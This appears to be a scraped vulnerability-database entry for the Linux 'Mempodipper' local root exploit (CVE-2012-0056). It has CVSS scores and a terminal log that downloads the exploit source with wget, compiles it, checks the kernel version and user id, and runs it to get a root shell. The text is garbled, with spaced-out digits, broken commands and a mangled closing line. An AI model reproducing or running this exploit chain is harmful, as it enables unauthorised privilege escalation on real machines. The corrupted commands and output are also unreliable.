6.9 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:M/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
46.4%
wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
gcc mempodipper. c-o mempodipper
netcat@netcat:~$ uname-r
3.0.0-1 2-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 n l
netcat@netcat:~$ uname-a
Linux netcat 3.0.0-1 2-generic #2 0-Ubuntu SMP Fri Oct 7 1 4:5 0:4 2 UTC 2 0 1 1 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1 0 0 0(netcat) gid=1 0 0 0(netcat) Group=1 0 0 0(netcat),4(adm),2 0(dialout),2 4(cdrom),4 6(plugdev),1 1 6(lpadmin),1 1 8(admin),1 2 4(sambashare)
netcat@netcat:~$ ./ mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 2 1, 2 0 1 2 =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0×8 0 4 9 5 7 0.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3 0 1 2/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0×8 0 4 9 5 6 4.
[+] Executing su with shellcode.
sh-4.2#
From http://www.4shell.org/archives/2149.html
The effect of the self-test it!